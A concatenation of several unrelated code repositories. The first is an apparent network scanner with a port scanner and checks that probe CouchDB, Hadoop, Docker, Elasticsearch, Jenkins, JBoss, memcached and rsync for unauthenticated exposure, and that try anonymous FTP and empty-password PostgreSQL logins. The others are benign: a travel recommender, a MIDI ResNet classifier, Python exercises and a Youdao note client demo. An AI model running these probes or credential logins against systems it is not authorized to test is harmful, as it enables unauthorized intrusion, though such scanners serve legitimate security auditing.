BarColumn(),
"[progress.percentage]{task.percentage:>3.1f}%",
"•",
"[bold green]{task.completed}/{task.total}",
"•",
TransferSpeedColumn(),
"•",
TimeRemainingColumn(),
transient=True, # 100%后隐藏进度条
)
self.progress_bar = self.process.add_task("[cyan]port scan...", total=len(self.targets) * len(self.port_list))
async def async_port_check(self, semaphore, host_port):
async with semaphore:
host, port = host_port
try:
conn = asyncio.open_connection(host, port)
reader, writer = await asyncio.wait_for(conn, timeout=self.timeout)
conn.close()
return host, port, 'open'
except Exception:
conn.close()
return host, port, 'close'
# 回调函数,更新进度条,存储开放的端口
def callback(self, future):
host, port, status = future.result()
self.process.advance(self.progress_bar, advance=1)
if status == "open":
# print(ip,port,status)
try:
if host in self.open_list:
self.open_list[host].append(port)
else:
self.open_list[host] = [port]
except Exception as e:
print(e)
else:
pass
def async_tcp_port_scan(self):
# 不支持带协议的url,比如 https://127.0.0.1,格式化一下目标
for url in self.targets:
host, scheme = get_host(url)
self.hosts.append(host)
host_port_list = [(host, int(port)) for host in self.hosts for port in self.port_list]
print(host_port_list)
sem = asyncio.Semaphore(self.rate) # 限制并发量
loop = asyncio.get_event_loop()
# 打乱一下,随机排序
random.shuffle(host_port_list)
tasks = list()
with self.process:
for host_port in host_port_list:
task = asyncio.ensure_future(self.async_port_check(sem, host_port))
task.add_done_callback(self.callback)
tasks.append(task)
if platform.system() != "Windows":
import uvloop
asyncio.set_event_loop_policy(uvloop.EventLoopPolicy())
loop.run_until_complete(asyncio.wait(tasks))
return self.open_list
if __name__ == '__main__':
# 不支持带协议的,比如 https://127.0.0.1
hosts = ['127.0.0.1', '127.0.0.1']
ports = [80,443,3389,22,21,3750]
import time
now = time.time
start = now()
ps = PortScan(hosts, ports, 2000)
# {'127.0.0.1': [80, 22], '127.0.0.1': [22, 443, 80]}
print(ps.async_tcp_port_scan())
print("Time:",now() - start)
--- FILE SEPARATOR ---
#!/usr/bin/python3
# -*- coding:utf-8 -*-
# @Author : yhy
# CouchDB 未授权访问
import requests
from lib.common.utils import save_script_result
from lib.config.setting import default_headers
ports_to_check = 5984 # 默认扫描端口
def do_check(self, url):
if url != '/':
return
port = 5984
if self.scheme == 'CouchDB' and self.port != 5984: # 非标准端口
port = self.port
elif 5984 not in self.ports_open:
return
try:
url = 'http://' + self.host + ':' + str(port) + '/_utils/'
r = requests.get(url, timeout=5, verify=False, headers=default_headers)
if 'couchdb-logo' in r.content.decode():
save_script_result(self, '', 'http://%s:%s/_utils/' % (self.host, port), 'CouchDB Unauthorized Accesss')
except Exception as e:
pass
--- FILE SEPARATOR ---
#!/usr/bin/python3
# -*- coding:utf-8 -*-
# @Author : yhy
# Hadoop 未授权访问
import requests
from lib.common.utils import save_script_result
from lib.config.setting import default_headers
ports_to_check = 50070 # 默认扫描端口
def do_check(self, url):
if url != '/':
return
port = 50070
if self.scheme == 'Hadoop' and self.port != 50070: # 非标准端口
port = self.port
elif 50070 not in self.ports_open:
return
try:
url = 'http://' + self.host + ':' + str(port) + '/dfshealth.html'
r = requests.get(url, timeout=5, verify=False, headers = default_headers)
if 'hadoop.css' in r.content.decode():
save_script_result(self, '', 'http://%s:%s/dfshealth.html' % (self.host, port), 'Hadoop Unauthorized Accesss')
except Exception as e:
pass
--- FILE SEPARATOR ---
#!/usr/bin/python3
# -*- coding:utf-8 -*-
# @Author : yhy
# Hadoop yarn 未授权访问
import requests
from lib.common.utils import save_script_result
from lib.config.setting import default_headers
ports_to_check = 8088 # 默认扫描端口
def do_check(self, url):
if url != '/':
return
port = 8088
if self.scheme == 'Hadoop yarn' and self.port != 8088: # 非标准端口
port = self.port
elif 8088 not in self.ports_open:
return
try:
url = 'http://' + self.host + ':' + str(port) + '/ws/v1/cluster/info'
r = requests.get(url, timeout=5, verify=False, headers = default_headers)
if 'resourceManagerVersionBuiltOn' in r.content.decode() or 'hadoopVersion'in r.content.decode():
save_script_result(self, '', 'http://%s:%s/ws/v1/cluster/info' % (self.host, port), 'Hadoop yarn Unauthorized Accesss')
except Exception as e:
pass
--- FILE SEPARATOR ---
#!/usr/bin/python3
# -*- coding:utf-8 -*-
# @Author : yhy
# docker api 未授权访问
import requests
from lib.common.utils import save_script_result
from lib.config.setting import default_headers
ports_to_check = 2375 # 默认扫描端口
def do_check(self, url):
if url != '/':
return
port = 2375
if self.scheme == 'docker api' and self.port != 2375: # 非标准端口
port = self.port
elif 2375 not in self.ports_open:
return
try:
url = 'http://' + self.host + ':' + str(port) + '/version'
r = requests.get(url, timeout=5, verify=False, headers = default_headers)
if 'ApiVersion' in r.content.decode():
save_script_result(self, '', 'http://%s:%s/version' % (self.host, port), 'docker api Unauthorized Accesss')
except Exception as e:
pass
--- FILE SEPARATOR ---
#!/usr/bin/python3
# -*- coding:utf-8 -*-
# @Author : yhy
# docker registry api 未授权访问
import requests
from lib.common.utils import save_script_result
ports_to_check = 30000 # 默认扫描端口
def do_check(self, url):
if url != '/':
return
port = 30000
if self.scheme == 'docker api' and self.port != 30000: # 非标准端口
port = self.port
elif 30000 not in self.ports_open:
return
try:
r0 = requests.get(f"http://{self.host}:{port}/v2/_catalog", timeout=5, verify=False)
if "repositories" in r0.text:
save_script_result(self, '', 'http://%s:%s/v2/_catalog' % (self.host, port), 'docker registry api Unauthorized Accesss')
return
r = requests.get(f"http://{self.host}:{port}/v1/_catalog", timeout=5, verify=False)
if "repositories" in r.text:
save_script_result(self, '', 'http://%s:%s/v1/_catalog' % (self.host, port), 'docker registry api Unauthorized Accesss')
return
except Exception as e:
pass
--- FILE SEPARATOR ---
#!/usr/bin/python3
# -*- coding:utf-8 -*-
# @Author : yhy
# elasticsearch 未授权访问
import requests
from lib.common.utils import save_script_result
ports_to_check = 9200 # 默认扫描端口
def do_check(self, url):
if url != '/':
return
port = 9200
if self.scheme == 'elasticsearch' and self.port != 9200: # 非标准端口
port = self.port
elif 9200 not in self.ports_open:
return
try:
url = 'http://' + self.host + ':' + str(port) + '/_cat'
r = requests.get(url, timeout=5)
if '/_cat/master' in r.content.decode():
save_script_result(self, '', 'http://%s:%s/_cat' % (self.host, port), 'Elasticsearch Unauthorized Accesss')
except Exception as e:
pass
--- FILE SEPARATOR ---
#!/usr/bin/python3
# -*- coding:utf-8 -*-
# @Author : yhy
# FTP 未授权访问
import ftplib
from lib.common.utils import save_script_result
ports_to_check = 21 # 默认扫描端口
def do_check(self, url):
if url != '/':
return
port = 21
if self.scheme == 'ftp' and self.port != 21: # 非标准端口
port = self.port
elif 21 not in self.ports_open:
return
try:
ftp = ftplib.FTP()
ftp.connect(self.host, port, timeout=5) # 连接的ftp sever和端口
ftp.login('anonymous', 'Aa@12345678')
save_script_result(self, '', 'ftp://%s:%s/' % (self.host, port), 'FTP Unauthorized Accesss')
except Exception as e:
pass
--- FILE SEPARATOR ---
#!/usr/bin/python3
# -*- coding:utf-8 -*-
# @Author : yhy
# JBoss 未授权访问
import requests
from lib.common.utils import save_script_result
ports_to_check = 8080 # 默认扫描端口
def do_check(self, url):
if url != '/':
return
port = 8080
if self.scheme == 'jenkins' and self.port != 8080: # 非标准端口
port = self.port
elif 8080 not in self.ports_open:
return
try:
url = 'http://' + self.host + ':' + str(port) + '/jmx-console/HtmlAdaptor?action=displayMBeans'
r = requests.get(url, timeout=5)
if 'JBoss JMX Management Console' in r.content.decode() and r.status_code == 200 and 'jboss' in r.content.decode():
save_script_result(self, '', 'http://%s:%s/jmx-console/HtmlAdaptor?action=displayMBeans' % (self.host, port), 'JBoss Unauthorized Accesss')
except Exception as e:
pass
--- FILE SEPARATOR ---
#!/usr/bin/python3
# -*- coding:utf-8 -*-
# @Author : yhy
# jenkins 未授权访问
import requests
from lib.common.utils import save_script_result
ports_to_check = 8080 # 默认扫描端口
def do_check(self, url):
if url != '/':
return
port = 8080
if self.scheme == 'jenkins' and self.port != 8080: # 非标准端口
port = self.port
elif 8080 not in self.ports_open:
return
try:
url = 'http://' + self.host + ':' + str(port) + '/systemInfo'
r = requests.get(url, timeout=5)
if 'jenkins.war' in r.content.decode() and 'JENKINS_HOME' in r.content.decode():
save_script_result(self, '', 'http://%s:%s/systemInfo' % (self.host, port), 'jenkins Unauthorized Accesss')
except Exception as e:
pass
--- FILE SEPARATOR ---
#!/usr/bin/python3
# -*- coding:utf-8 -*-
# @Author : yhy
# memcached 未授权访问
import socket
from lib.common.utils import save_script_result
ports_to_check = 11211 # 默认扫描端口
def do_check(self, url):
if url != '/':
return
port = 11211
if self.scheme == 'memcached' and self.port != 11211: # 非标准端口
port = self.port
elif 11211 not in self.ports_open:
return
try:
socket.setdefaulttimeout(5)
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((self.host, port))
s.send(bytes('stats\r\n', 'UTF-8'))
if 'version' in s.recv(1024).decode():
save_script_result(self, '', 'memcached://%s:%s' % (self.host, port), 'Memcached Unauthorized Accesss')
s.close()
except Exception as e:
pass
finally:
s.close()
--- FILE SEPARATOR ---
#!/usr/bin/python
# -*- encoding: utf-8 -*-
# PostgreSQL 空口令访问
import psycopg2
from lib.common.utils import save_script_result
ports_to_check = 5432 # 默认扫描端口
def do_check(self, url):
if url != '/':
return
port = 5432
if self.scheme == 'PostgreSQL' and self.port != 5432: # 非标准端口
port = self.port
elif 5432 not in self.ports_open:
return
try:
conn = psycopg2.connect(database="postgres", user="postgres", password="", host=self.host, port=port)
save_script_result(self, '', 'mysql://%s:%s' % (self.host, port), '', 'PostgreSQL empty password')
except Exception as e:
pass
--- FILE SEPARATOR ---
#!/usr/bin/env python
# -*- encoding: utf-8 -*-
# rsync 未授权访问
import socket
from lib.common.utils import save_script_result
ports_to_check = 873 # 默认扫描端, 会扫描端口是否开放
def do_check(self, url):
if url != '/':
return
port = 873
# 非标准端口,不需要检查端口是否开放
if self.scheme == 'rsync' and self.port != 873:
port = self.port
elif 873 not in self.ports_open:
return
try:
socket.setdefaulttimeout(5)
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((self.host, port))
s.send(bytes("", 'UTF-8'))
result = s.recv(1024).decode()
if "RSYNCD" in result:
save_script_result(self, '', 'rsync://%s:%s' % (self.host, port), 'Rsync Unauthorized Access')
except Exception as e:
s.close()
|
[
"/SScan.py",
"/lib/common/common.py",
"/lib/common/connectionPool.py",
"/lib/common/scanner.py",
"/lib/common/utils.py",
"/lib/config/__init__.py",
"/lib/config/banner.py",
"/lib/config/data.py",
"/lib/config/log.py",
"/lib/module/PortScan.py",
"/lib/module/__init__.py",
"/lib/module/fofa.py",
"/lib/module/iscdn.py",
"/lib/module/proxy.py",
"/pocs/scripts/mysql_Empty_pwd.py",
"/pocs/scripts/tools/PortScan.py",
"/pocs/scripts/unauthorized_access_CouchDB.py",
"/pocs/scripts/unauthorized_access_Hadoop.py",
"/pocs/scripts/unauthorized_access_Hadoop_yarn.py",
"/pocs/scripts/unauthorized_access_docker.py",
"/pocs/scripts/unauthorized_access_docker_registry_api.py",
"/pocs/scripts/unauthorized_access_elasticsearch.py",
"/pocs/scripts/unauthorized_access_ftp.py",
"/pocs/scripts/unauthorized_access_jboss.py",
"/pocs/scripts/unauthorized_access_jenkins.py",
"/pocs/scripts/unauthorized_access_memcached.py",
"/pocs/scripts/unauthorized_access_postgresb.py",
"/pocs/scripts/unauthorized_access_rsync.py"
] |
02iceskate/Travel-Inspiration
|
import scrapy
from ..items import CountryItem
from scrapy.loader import ItemLoader
from bs4 import BeautifulSoup
class CitiesSpider(scrapy.Spider):
name = "zomato"
start_urls= ['https://www.zomato.com/directory']
def parse(self, response):
soup = BeautifulSoup(response.text, 'html5lib')
for item in soup.select(".row h2 > a"):
yield {"name":item.text}
#yield city
#item = {}
#for city in response.css('.normal a'):
#cities_name = response.xpath('//div//h2//a/text()').extract_first()
#items['cities_name'] = cities_name
#yield items
#city = response.xpath("//div[@class='col-l-5 col-s-8 item pt0 pb5 ml0']//h2 [@class]").extract_first()
#yield scrapy.Request(url = start_url, callback=self.parse)
#cities_name = response.css('.normal a::text').extract()
#items['cities_name'] = cities_name
#yield items
#soup = BeautifulSoup(response.text, 'html5lib')
# for item in soup.select(".row h2 > a"):
#yield {"cities_name":item.text}
--- FILE SEPARATOR ---
import requests
import numpy as np
import pandas as pd
import json
from requests_futures.sessions import FuturesSession
from titlecase import titlecase
from location import location_id
with open('./data_city.json', 'r') as myfile: #the json file contains all the cities which the api developer is working on
data=myfile.read()
obj = json.loads(data)
cities = []
cities = [obj[i].get('name').rstrip().lower() for i in range(0,len(obj))]
popularity_index = []
nightlife_indices =[]
countries = []
session = FuturesSession(max_workers=16)
# Create a dataframe to store all the indinces and saved it as csv file
#for city in cities[0:10]:
#country, popularity, nightlife_index = location_id(session,city)
#popularity_index.append(popularity)
#nightlife_indices.append(nightlife_index )
#countries.append(country)
#df = pd.DataFrame(np.column_stack([countries,cities[0:10],popularity_index, nightlife_indices]), columns = ['Country', 'City','Popularity_index','Nightlife_index'])
#df['Average'] = (df['Popularity_index'].astype('float') + df['Nightlife_index'].astype('float'))/2
#df.to_csv(r'C:\\Users\\user\\Documents\\Tech_challenge\\city_index.csv',index = None, header=True)
df_csv = pd.read_csv('..\\Tech Challenge\\city_index.csv') #the csv file only saves the first 250 cities as there is
#limitation of request per day
# Ask the client to fill in
popular_marks = float(input("Please input the popularity you prefer: (5 is the highest)"))
nightlife_marks = float(input("Please input the nightlife index you prefer: (5 is the highest)"))
# we will weight the one higher with the higher marks
if popular_marks > nightlife_marks:
calculation = popular_marks*0.7 + nightlife_marks*0.3
elif popular_marks == nightlife_marks:
calculation = popular_marks*0.5 + nightlife_marks*0.5
else:
calculation = popular_marks*0.3 + nightlife_marks*0.7
df_csv['Difference'] = abs(df_csv['Average'] - calculation)
# Return the first three suggestions
first_suggestion_country = df_csv.nsmallest(10,'Difference')[df_csv.nsmallest(10,'Difference')['Popularity_index'] > 3.5].values.tolist()[0][0]
first_suggestion_city = df_csv.nsmallest(10,'Difference')[df_csv.nsmallest(10,'Difference')['Popularity_index'] > 3.5].values.tolist()[0][1]
second_suggestion_country = df_csv.nsmallest(10,'Difference')[df_csv.nsmallest(10,'Difference')['Popularity_index'] > 3.5].values.tolist()[1][0]
second_suggestion_city = df_csv.nsmallest(10,'Difference')[df_csv.nsmallest(10,'Difference')['Popularity_index'] > 3.5].values.tolist()[1][1]
third_suggestion_country = df_csv.nsmallest(10,'Difference')[df_csv.nsmallest(10,'Difference')['Popularity_index'] > 3.5].values.tolist()[2][0]
third_suggestion_city = df_csv.nsmallest(10,'Difference')[df_csv.nsmallest(10,'Difference')['Popularity_index'] > 3.5].values.tolist()[2][1]
print("\n1st suggested location: "+"\nCountry: "+first_suggestion_country+"\nCity: "+titlecase(first_suggestion_city))
print("\n2nd suggested location: "+"\nCountry: "+second_suggestion_country+"\nCity: "+titlecase(second_suggestion_city))
print("\n3rd suggested location: "+"\nCountry: "+third_suggestion_country+"\nCity: "+titlecase(third_suggestion_city))
--- FILE SEPARATOR ---
import requests
import json
import os
#retrieve info from Zomato
user_key = os.environ.get('USER-KEY')
headers = {"Accept": "application/json",
"user-key": user_key}
def location_id(session, city): #return the location id of a city
url = 'https://developers.zomato.com/api/v2.1/locations?query='+city
data = {"query": city, "count":1}
global headers
res_city = requests.post(url,data=data,headers=headers)
x = json.loads(res_city.text)
y = x.get('location_suggestions')[0].get('entity_id') #retreive the location id
z = x.get('location_suggestions')[0].get('entity_type') # retrieve 'city' or 'country'
a = x.get('location_suggestions')[0].get('country_name') #retrieve corresponding country name
def location_details(entity_id,entity_type):
url = 'https://developers.zomato.com/api/v2.1/location_details?entity_id='+str(entity_id)+'&entity_type='+entity_type
data_loc = {"entity_id": entity_id, "entity_type": entity_type}
res_loc = requests.post(url,data=data_loc,headers=headers)
popularity = json.loads(res_loc.text).get('popularity') #return the popularity index of a city
nightlife_index = json.loads(res_loc.text).get('nightlife_index') ##return the nightlife index of a city
return(popularity,nightlife_index)
b,c = location_details(y,z)
return (a,b,c)
--- FILE SEPARATOR ---
import requests
import numpy as np
import json
import os
#retreive info from Sygic travel site
X = os.environ.get('X-API-KEY')
headers = headers = {"x-api-key ": X
}
def location_id(location):
url_place = 'https://api.sygictravelapi.com/1.1/en/places/list?limit=1&query='+location
global headers
city_id = requests.get(url_place,headers=headers)
x = json.loads(city_id.content)
city_id = x.get('data').get('places')[0].get('id')
country_id = list(filter(lambda x: x[0:7] == 'country',x.get('data').get('places')[0].get('parent_ids')))
return city_id, country_id[0]
def places(place_id):
url_collection = 'https://api.sygictravelapi.com/1.1/en/collections'
global headers
newlist = {'sightseeing': [], 'hiking': [],'eating':[],'discovering': [], 'going_out': [],'playing':[],'relaxing': [],
'shopping': [],'sleeping':[],'doing_sports': [], 'traveling': []}
params = {'parent_place_id': place_id}
req_collection = requests.get(url_collection,headers=headers,params = params)
x = json.loads(req_collection.content)
y = x.get('data').get('collections')[0].get('place_ids')
for i in y:
c,d = place_poi(poi_id = i)
for category in d:
for item in list(newlist.keys()):
if category == item:
newlist.get(item).append(c)
return newlist
def place_poi(poi_id):
url_place = 'https://api.sygictravelapi.com/1.1/en/places/'+str(poi_id)
global headers
places = requests.get(url_place,headers=headers)
c = json.loads(places.content).get('data').get('place').get('name')
d = json.loads(places.content).get('data').get('place').get('categories')
return c,d
--- FILE SEPARATOR ---
import requests
import numpy as np
import json
from places_f import location_id, places
#retreive info from Sygic travel site
cities = ['london','osaka'] #suppose the cities generated from location.py are london and osaka
cities_id = []
countries_id = []
for city in cities:
city_id, country_id = location_id(city) # firstly we find out the id for the corresponding cities
suggestion = places(place_id = city_id)
print(city.upper())
print('The followings are recommended:')
print(suggestion)
--- FILE SEPARATOR ---
import os
X = os.environ.get('X-API-KEY')
print(X)
|
[
"/country_scrapy/country/spiders/cities.py",
"/inspiration.py",
"/location.py",
"/places_f.py",
"/places_from_inspiration.py",
"/testing.py"
] |
02w/ResNet-for-TSC
|
import os
import joblib
import muspy
import torch
import random
from pytorch_lightning import LightningDataModule
from sklearn.model_selection import train_test_split
from sklearn.preprocessing import scale
from torch.nn.utils.rnn import pad_sequence
from torch.utils.data import Dataset, DataLoader
class RawDataset(object):
def __init__(self, path, shuffle=True):
self.path = path
self.files = []
self.train_files = []
self.dev_files = []
self.test_files = []
self.train_data = []
self.dev_data = []
self.test_data = []
self.labels = []
self.shuffle = shuffle
self.get_filenames()
self.read_data()
def get_filenames(self):
self.labels = os.listdir(self.path)
for d in self.labels:
files = os.listdir(os.path.join(self.path, d))
train, test = train_test_split(files, test_size=0.2, random_state=17)
train, dev = train_test_split(train, test_size=0.2, random_state=17)
self.files.extend([os.path.join(d, i) for i in files])
self.train_files.extend([os.path.join(d, i) for i in train])
self.dev_files.extend([os.path.join(d, i) for i in dev])
self.test_files.extend([os.path.join(d, i) for i in test])
if self.shuffle:
random.shuffle(self.train_files)
random.shuffle(self.dev_files)
random.shuffle(self.test_files)
def read_data(self):
filename_lists = [self.train_files, self.dev_files, self.test_files]
data_lists = [self.train_data, self.dev_data, self.test_data]
for files, data in zip(filename_lists, data_lists):
for midi in files:
label = os.path.split(midi)[0]
try:
music = muspy.read_midi(os.path.join(self.path, midi))
# choose the longest track
track_len = [len(i) for i in music.tracks]
track = music.tracks[track_len.index(max(track_len))]
# Note-based representation:
# (time, pitch, duration, velocity) for each note, used as 4 channels in ResNet
rep = muspy.Music(resolution=music.resolution, tracks=[track]).to_note_representation()
data.append((rep, label))
except Exception as e:
print(f'Failed to read file {midi}!')
print(e)
def save(self, filename='data.joblib'):
joblib.dump(self, filename)
@staticmethod
def load(filename='data.joblib'):
return joblib.load(filename)
class TorchDataset(Dataset):
def __init__(self, labels, inputs):
self.labels = labels
self.inputs = inputs
def __getitem__(self, item):
# NOTICE: Type of input is float!
return torch.tensor(self.labels[item]), torch.tensor(self.inputs[item]).float()
def __len__(self):
return len(self.inputs)
def collate_fn(data):
labels, inputs = map(list, zip(*data))
labels = torch.tensor(labels)
inputs = pad_sequence(inputs, batch_first=True)
# (Batch, Length, Channels) -> (Batch, Channels, Length)
inputs = inputs.transpose(1, 2)
return labels, inputs
class DataModule(LightningDataModule):
def __init__(self, path, batch_size):
super().__init__()
self.path = path
self.bath_size = batch_size
self.data: RawDataset = None
self.train_dataset: TorchDataset = None
self.dev_dataset: TorchDataset = None
self.test_dataset: TorchDataset = None
def prepare_data(self):
if os.path.exists(f'{self.path}.joblib'):
self.data = RawDataset.load(f'{self.path}.joblib')
print(f'Loaded data from exsiting file({self.path}.joblib)! If the dataset has been changed, DELETE this file!')
else:
self.data = RawDataset(self.path, shuffle=True)
self.data.save(f'{self.path}.joblib')
def setup(self, stage=None):
self.train_dataset, self.dev_dataset, self.test_dataset = (
TorchDataset(
# string label -> numeric label
labels=[self.data.labels.index(i[1]) for i in d],
# scale per sample
inputs=[scale(i[0]) for i in d]
# inputs=[np.delete(i[0], 0, axis=1) for i in d]
) for d in [self.data.train_data, self.data.dev_data, self.data.test_data])
def train_dataloader(self):
return DataLoader(
dataset=self.train_dataset,
batch_size=self.bath_size,
collate_fn=collate_fn,
shuffle=True
)
def val_dataloader(self):
return DataLoader(
dataset=self.dev_dataset,
batch_size=self.bath_size,
collate_fn=collate_fn,
shuffle=False
)
def test_dataloader(self):
return DataLoader(
dataset=self.test_dataset,
batch_size=self.bath_size,
collate_fn=collate_fn,
shuffle=False
)
--- FILE SEPARATOR ---
import torch.nn as nn
import torch.nn.functional as F
def same_conv1d(in_channels, n_feature_maps, kernel_size):
if kernel_size % 2 == 1:
return nn.Conv1d(in_channels, n_feature_maps, kernel_size, padding=kernel_size // 2)
else:
return nn.Sequential(
nn.ConstantPad1d((kernel_size // 2 - 1, kernel_size // 2), 0),
nn.Conv1d(in_channels, n_feature_maps, kernel_size=kernel_size)
)
def block(in_channels, n_feature_maps, kernel):
return nn.Sequential(
same_conv1d(in_channels, n_feature_maps, kernel[0]),
nn.BatchNorm1d(n_feature_maps),
nn.ReLU(inplace=True),
same_conv1d(n_feature_maps, n_feature_maps, kernel[1]),
nn.BatchNorm1d(n_feature_maps),
nn.ReLU(inplace=True),
same_conv1d(n_feature_maps, n_feature_maps, kernel[2]),
nn.BatchNorm1d(n_feature_maps)
)
def shortcut(in_channels, n_feature_maps):
return nn.Sequential(
nn.Conv1d(in_channels, n_feature_maps, kernel_size=1),
nn.BatchNorm1d(n_feature_maps)
)
class ResNet(nn.Module):
def __init__(self, in_channels, n_feature_maps, n_classes, kernel_size: list):
super().__init__()
self.in_channels = in_channels
self.n_feature_maps = n_feature_maps
self.n_classes = n_classes
assert len(kernel_size) == 3
self.kernel_size = kernel_size
self.conv1 = block(self.in_channels, self.n_feature_maps, self.kernel_size)
self.shortcut1 = shortcut(self.in_channels, self.n_feature_maps)
self.activation1 = nn.ReLU(inplace=True)
self.conv2 = block(self.n_feature_maps, 2 * self.n_feature_maps, self.kernel_size)
self.shortcut2 = shortcut(self.n_feature_maps, 2 * self.n_feature_maps)
self.activation2 = nn.ReLU(inplace=True)
self.conv3 = block(2 * self.n_feature_maps, 2 * self.n_feature_maps, self.kernel_size)
self.shortcut3 = nn.BatchNorm1d(2 * self.n_feature_maps)
self.activation3 = nn.ReLU(inplace=True)
# global avg pooling
self.gap = nn.AdaptiveAvgPool1d(1)
self.fc = nn.Linear(2 * self.n_feature_maps, n_classes)
def forward(self, x):
conv = self.activation1(self.conv1(x) + self.shortcut1(x))
conv = self.activation2(self.conv2(conv) + self.shortcut2(conv))
conv = self.activation3(self.conv3(conv) + self.shortcut3(conv))
output = self.gap(conv)
output = self.fc(output.squeeze(2))
output = F.log_softmax(output, dim=-1)
return output
--- FILE SEPARATOR ---
import pytorch_lightning as pl
import torch
import torch.nn.functional as F
import torch.optim as optim
from torchmetrics.functional import accuracy, f1
from resnet import ResNet
class ResNetRunner(pl.LightningModule):
def __init__(self, in_channels, n_feature_maps, n_classes, kernel_size: list, lr=5e-4):
super().__init__()
self.save_hyperparameters()
self.model = ResNet(self.hparams.in_channels, self.hparams.n_feature_maps, self.hparams.n_classes, self.hparams.kernel_size)
# example data (Batch = 1, Channels, Length = 10)
self.example_input_array = torch.rand(1, self.hparams.in_channels, 10, device=self.device)
def forward(self, x):
return self.model.forward(x)
def configure_optimizers(self):
optimizer = optim.Adam(self.parameters(), lr=self.hparams.lr)
return {
'optimizer': optimizer,
'lr_scheduler': optim.lr_scheduler.ReduceLROnPlateau(optimizer, factor=0.3, patience=30, min_lr=1e-4),
'monitor': 'Validation step loss'
}
def training_step(self, batch, batch_idx):
y, x = batch
output = self.model.forward(x)
loss = F.nll_loss(output, y)
self.log('Train step loss', loss, on_epoch=True, on_step=False)
return loss
def _evaluate(self, x):
self.eval()
output = self.model.forward(x)
pred = torch.argmax(output, dim=-1)
return pred, output
def validation_step(self, batch, batch_idx):
y, x = batch
pred, output = self._evaluate(x)
loss = F.nll_loss(output, y)
dev_acc = accuracy(pred, y)
dev_f1 = f1(pred, y, num_classes=self.hparams.n_classes)
self.log('Validation step loss', loss)
self.log('Validation Acc', dev_acc)
self.log('Validation F1', dev_f1)
return loss
@torch.no_grad()
def predict(self, x: list) -> list:
"""
Get prediction for samples.
:param x: a list of ndarrays with size (channel, length)
:return: a list of labels
"""
assert type(x) is list
ret = []
for i in x:
assert i.shape[0] == self.hparams.in_channels and i.ndim == 2
sample = torch.tensor(i).unsqueeze(0).float()
pred, _ = self._evaluate(sample)
ret.append(int(pred.item()))
return ret
--- FILE SEPARATOR ---
import pytorch_lightning as pl
from pytorch_lightning.callbacks import ModelCheckpoint, LearningRateMonitor
from sklearn.metrics import classification_report
from sklearn.preprocessing import scale
from dataset import DataModule, RawDataset
from runner import ResNetRunner
def train():
print('Training...')
dm = DataModule('midis', batch_size=10)
model = ResNetRunner(
in_channels=4,
n_feature_maps=64,
n_classes=2,
kernel_size=[8, 5, 3]
)
checkpoint = ModelCheckpoint(
dirpath='versions/swa2/checkpoints',
monitor='Validation F1',
mode='max',
save_top_k=20,
save_last=True
)
lr_monitor = LearningRateMonitor(logging_interval='epoch')
trainer = pl.Trainer(
max_epochs=150,
callbacks=[checkpoint, lr_monitor],
stochastic_weight_avg=True,
gpus=1,
weights_summary='full'
)
trainer.fit(model, dm)
# save best_k_models to a yaml file
checkpoint.to_yaml()
return model, checkpoint.best_model_path
def test(model=None, use_ckpt=False):
print('Testing...')
data = RawDataset.load('midis.joblib')
if use_ckpt:
print(model)
model = ResNetRunner.load_from_checkpoint(model)
# pred = model.predict([np.delete(i[0], 0, axis=1).T for i in data.test_data])
pred = model.predict([scale(i[0]).T for i in data.test_data])
print(classification_report([i[1] for i in data.test_data], [data.labels[i] for i in pred]))
def export(model=None, use_ckpt=False, save='model.pt'):
if use_ckpt:
print(model)
model = ResNetRunner.load_from_checkpoint(model)
script = model.to_torchscript(save, method='trace')
return script
if __name__ == '__main__':
pl.seed_everything(17)
model, best_path = train()
test(model)
test(model=best_path, use_ckpt=True)
test(model='versions/swa/checkpoints/last.ckpt', use_ckpt=True)
test(model='versions/swa/checkpoints/epoch=99-step=1899.ckpt', use_ckpt=True)
test(model='versions/checkpoints/epoch=59-step=1139.ckpt', use_ckpt=True)
export(model='versions/swa/checkpoints/epoch=99-step=1899.ckpt', use_ckpt=True, save='swa99.pt')
# model = torch.jit.load('model.pt')
|
[
"/dataset.py",
"/resnet.py",
"/runner.py",
"/train.py"
] |
031205/Wave-3
|
from math import sqrt
def HypotenuseCalculator(a,b):
hypotenuse = sqrt(a*a + b*b)
return hypotenuse
side1 = input('Input the length of the first shorter side of a triangle: ')
side1 = float(side1)
side2 = input('Input the length of the second shorter side of a triangle: ')
side2 = float(side2)
if side1 > 0 and side2 > 0:
hypotenuse = HypotenuseCalculator(side1,side2)
print('The length of the hypotenuse of this triangle is',hypotenuse)
else:
print('Invalid input')
--- FILE SEPARATOR ---
def Shipping_Calculator(num):
n = 10.95 + (num - 1) * 2.95
return n
item_num = input('Enter the number of items in the order: ')
item_num = int(item_num)
if item_num > 0:
shipping_charge = Shipping_Calculator(item_num)
print('The shipping charge of your order is $',round(shipping_charge,2),sep='')
else:
print('Ivalid Input')
--- FILE SEPARATOR ---
def PrimeNumberIndicator(a):
if a >= 2:
for i in range(2,a):
if a % i == 0:
return False
return True
else:
return False
--- FILE SEPARATOR ---
from Exercise92 import PrimeNumberIndicator
num = input('Input an integer number: ')
num = int(num)
b = PrimeNumberIndicator(num)
if b is True:
print('It is a prime number.')
elif b is False:
print('It is not a prime number.')
--- FILE SEPARATOR ---
n = input('Enter an integer (2 or greater): ')
n = int(n)
if n >= 2:
print('The prime factors of',n,'are:')
factor_list = []
factor = 2
while factor <= n:
if n % factor == 0:
n = n / factor
factor_list.append(factor)
else:
factor = factor + 1
for i in factor_list:
print(i)
else:
print('This number is invalid.')
|
[
"/Exercise81.py",
"/Exercise83.py",
"/Exercise92.py",
"/Exercise92Main.py",
"/prime factors.py"
] |
0312birdzhang/youdaonotepy
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import ynote
import webbrowser
import os.path
import ynote.oauth2 as oauth2
consumer_key = 'your consumer key'
consumer_secret = 'your consumer secret'
token_file = 'demo.token'
client = ynote.YNoteClient(consumer_key, consumer_secret)
if os.path.exists(token_file):
f = open(token_file)
client.access_token = oauth2.Token(f.readline().strip(), f.readline().strip())
f.close()
else:
auth_url = client.grant_request_token(None)
print 'auth_url = '+auth_url
webbrowser.open(auth_url)
verifier = raw_input('Input verifier:')
client.grant_access_token(verifier)
print 'access_token=%s, secret=%s' % (client.access_token.key, client.access_token.secret)
f = open(token_file, 'w')
f.write(client.access_token.key+"\n"+client.access_token.secret)
f.close()
print '\get user info\n---------------------------'
user = client.get_user()
print user.__dict__
print '\nget notebooks\n----------------------------'
books = client.get_notebooks()
